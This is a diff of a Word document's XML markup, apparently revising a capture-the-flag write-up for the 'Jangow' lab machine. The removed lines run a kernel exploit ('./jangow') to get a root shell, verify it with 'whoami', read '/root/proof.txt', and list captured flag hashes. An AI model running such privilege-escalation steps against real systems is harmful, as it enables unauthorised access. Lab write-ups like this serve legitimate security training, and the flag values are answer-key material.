+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Root flag:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9369,7 +9486,6 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -9381,21 +9497,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>./</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>jangow</w:t>
+        <w:t>25d7ce0ee3cbf71efbac61f850c14fe</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9410,235 +9512,13 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>The exploit modified kernel credentials and spawned a root shell.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Output:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="916"/>
-          <w:tab w:val="left" w:pos="1832"/>
-          <w:tab w:val="left" w:pos="2748"/>
-          <w:tab w:val="left" w:pos="3664"/>
-          <w:tab w:val="left" w:pos="4580"/>
-          <w:tab w:val="left" w:pos="5496"/>
-          <w:tab w:val="left" w:pos="6412"/>
-          <w:tab w:val="left" w:pos="7328"/>
-          <w:tab w:val="left" w:pos="8244"/>
-          <w:tab w:val="left" w:pos="9160"/>
-          <w:tab w:val="left" w:pos="10076"/>
-          <w:tab w:val="left" w:pos="10992"/>
-          <w:tab w:val="left" w:pos="11908"/>
-          <w:tab w:val="left" w:pos="12824"/>
-          <w:tab w:val="left" w:pos="13740"/>
-          <w:tab w:val="left" w:pos="14656"/>
-        </w:tabs>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>credentials patched, launching shell</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Verification:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="916"/>
-          <w:tab w:val="left" w:pos="1832"/>
-          <w:tab w:val="left" w:pos="2748"/>
-          <w:tab w:val="left" w:pos="3664"/>
-          <w:tab w:val="left" w:pos="4580"/>
-          <w:tab w:val="left" w:pos="5496"/>
-          <w:tab w:val="left" w:pos="6412"/>
-          <w:tab w:val="left" w:pos="7328"/>
-          <w:tab w:val="left" w:pos="8244"/>
-          <w:tab w:val="left" w:pos="9160"/>
-          <w:tab w:val="left" w:pos="10076"/>
-          <w:tab w:val="left" w:pos="10992"/>
-          <w:tab w:val="left" w:pos="11908"/>
-          <w:tab w:val="left" w:pos="12824"/>
-          <w:tab w:val="left" w:pos="13740"/>
-          <w:tab w:val="left" w:pos="14656"/>
-        </w:tabs>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>whoami</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Output:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="916"/>
-          <w:tab w:val="left" w:pos="1832"/>
-          <w:tab w:val="left" w:pos="2748"/>
-          <w:tab w:val="left" w:pos="3664"/>
-          <w:tab w:val="left" w:pos="4580"/>
-          <w:tab w:val="left" w:pos="5496"/>
-          <w:tab w:val="left" w:pos="6412"/>
-          <w:tab w:val="left" w:pos="7328"/>
-          <w:tab w:val="left" w:pos="8244"/>
-          <w:tab w:val="left" w:pos="9160"/>
-          <w:tab w:val="left" w:pos="10076"/>
-          <w:tab w:val="left" w:pos="10992"/>
-          <w:tab w:val="left" w:pos="11908"/>
-          <w:tab w:val="left" w:pos="12824"/>
-          <w:tab w:val="left" w:pos="13740"/>
-          <w:tab w:val="left" w:pos="14656"/>
-        </w:tabs>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>root</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:noProof/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0350720D" wp14:editId="5D95E1CC">
-            <wp:extent cx="5731510" cy="4895215"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
-            <wp:docPr id="980032980" name="Picture 45"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D9689B5" wp14:editId="232DBB86">
+            <wp:extent cx="4847619" cy="3400000"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1091098906" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -9646,17 +9526,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="980032980" name="Picture 980032980"/>
+                    <pic:cNvPr id="1091098906" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId22">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
+                    <a:blip r:embed="rId21"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -9664,7 +9538,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="4895215"/>
+                      <a:ext cx="4847619" cy="3400000"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -9704,7 +9578,11 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -9716,237 +9594,8 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Root Flag</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>After gaining root privileges, the root directory was accessed.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Command:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="916"/>
-          <w:tab w:val="left" w:pos="1832"/>
-          <w:tab w:val="left" w:pos="2748"/>
-          <w:tab w:val="left" w:pos="3664"/>
-          <w:tab w:val="left" w:pos="4580"/>
-          <w:tab w:val="left" w:pos="5496"/>
-          <w:tab w:val="left" w:pos="6412"/>
-          <w:tab w:val="left" w:pos="7328"/>
-          <w:tab w:val="left" w:pos="8244"/>
-          <w:tab w:val="left" w:pos="9160"/>
-          <w:tab w:val="left" w:pos="10076"/>
-          <w:tab w:val="left" w:pos="10992"/>
-          <w:tab w:val="left" w:pos="11908"/>
-          <w:tab w:val="left" w:pos="12824"/>
-          <w:tab w:val="left" w:pos="13740"/>
-          <w:tab w:val="left" w:pos="14656"/>
-        </w:tabs>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>cat /root/proof.txt</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Root flag:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="916"/>
-          <w:tab w:val="left" w:pos="1832"/>
-          <w:tab w:val="left" w:pos="2748"/>
-          <w:tab w:val="left" w:pos="3664"/>
-          <w:tab w:val="left" w:pos="4580"/>
-          <w:tab w:val="left" w:pos="5496"/>
-          <w:tab w:val="left" w:pos="6412"/>
-          <w:tab w:val="left" w:pos="7328"/>
-          <w:tab w:val="left" w:pos="8244"/>
-          <w:tab w:val="left" w:pos="9160"/>
-          <w:tab w:val="left" w:pos="10076"/>
-          <w:tab w:val="left" w:pos="10992"/>
-          <w:tab w:val="left" w:pos="11908"/>
-          <w:tab w:val="left" w:pos="12824"/>
-          <w:tab w:val="left" w:pos="13740"/>
-          <w:tab w:val="left" w:pos="14656"/>
-        </w:tabs>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>da39a3ee5e6b4b0d3255bfef95601890afd80709</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:noProof/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03361748" wp14:editId="62E1534D">
-            <wp:extent cx="5731510" cy="4895215"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
-            <wp:docPr id="265801382" name="Picture 46"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="265801382" name="Picture 265801382"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId23">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="4895215"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -9958,25 +9607,13 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Flags Captured Summary</w:t>
       </w:r>
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblW w:w="7196" w:type="dxa"/>
+        <w:tblW w:w="6675" w:type="dxa"/>
         <w:tblCellSpacing w:w="15" w:type="dxa"/>
         <w:tblBorders>
           <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
@@ -9995,12 +9632,12 @@
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1337"/>
-        <w:gridCol w:w="5859"/>
+        <w:gridCol w:w="1446"/>
+        <w:gridCol w:w="5229"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="850"/>
+          <w:trHeight w:val="391"/>
           <w:tblHeader/>
           <w:tblCellSpacing w:w="15" w:type="dxa"/>
         </w:trPr>
@@ -10071,7 +9708,7 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="882"/>
+          <w:trHeight w:val="374"/>
           <w:tblCellSpacing w:w="15" w:type="dxa"/>
         </w:trPr>
         <w:tc>
@@ -10085,8 +9722,6 @@
               <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
                 <w:kern w:val="0"/>
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
@@ -10095,8 +9730,6 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
                 <w:kern w:val="0"/>
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
@@ -10116,8 +9749,6 @@
               <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
                 <w:kern w:val="0"/>
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
@@ -10126,21 +9757,18 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="4472C4" w:themeColor="accent1"/>
                 <w:kern w:val="0"/>
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>d41d8cd98f00b204e9800998ecf8427e</w:t>
+              <w:t>5b5b8e9b01ef27a1cc0a2d5fa87d7190</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="850"/>
+          <w:trHeight w:val="391"/>
           <w:tblCellSpacing w:w="15" w:type="dxa"/>
         </w:trPr>
         <w:tc>
@@ -10154,8 +9782,6 @@
               <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
                 <w:kern w:val="0"/>
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
@@ -10164,8 +9790,6 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
                 <w:kern w:val="0"/>
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
@@ -10185,8 +9809,6 @@
               <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
                 <w:kern w:val="0"/>
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
@@ -10195,14 +9817,11 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="4472C4" w:themeColor="accent1"/>
                 <w:kern w:val="0"/>
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>da39a3ee5e6b4b0d3255bfef95601890afd80709</w:t>
+              <w:t>25d7ce0ee3cbf71efbac61f850c14fe</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -10235,11 +9854,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
+      <w:r>
         <w:rPr>
